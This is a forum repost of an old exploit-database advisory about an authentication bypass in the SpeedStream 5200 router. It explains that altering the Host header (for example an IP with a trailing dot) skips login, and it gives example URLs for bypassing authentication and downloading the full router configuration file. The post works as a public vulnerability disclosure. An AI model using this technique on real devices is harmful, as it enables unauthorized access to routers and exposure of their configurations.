Forums: SpeedStream 5200 Authentication Bypass Config Download Vulnerability - Forums

Jump to content

Page 1 of 1
  • You cannot start a new topic
  • You cannot reply to this topic

SpeedStream 5200 Authentication Bypass Config Download Vulnerability

#1 User is offline   qcred11

  • Master Sergeant
  • Icon
Group:
Second Lieutenant
Posts:
2,523
Joined:
25-February 04

Posted 14 November 2008 - 06:19 AM

SpeedStream 5200 Authentication Bypass Config Download Vulnerability


 SpeedStream 5200 Authentication Bypass - hkm 12/10/2008
 (Server: NetPort Software 1.1)

 It is posible to bypass authentication by modifying the Host header.
 If you use a Host that is not the authentic one it will not require authentication.

 [url="http://189.255.255.255./"]http://189.255.255.255./[/url]          -  This would bypass authentication too.
 [url="http://189.255.255.255./x.cfg"]http://189.255.255.255./x.cfg[/url]     -  This downloads the full router conifguration.


 hkm [ @ ] hakim.ws
________________________________________________________________________________
______



Source: http://www.milw0rm.com/exploits/7055
0

Page 1 of 1
  • You cannot start a new topic
  • You cannot reply to this topic

1 User(s) are reading this topic
0 members, 1 guests, 0 anonymous users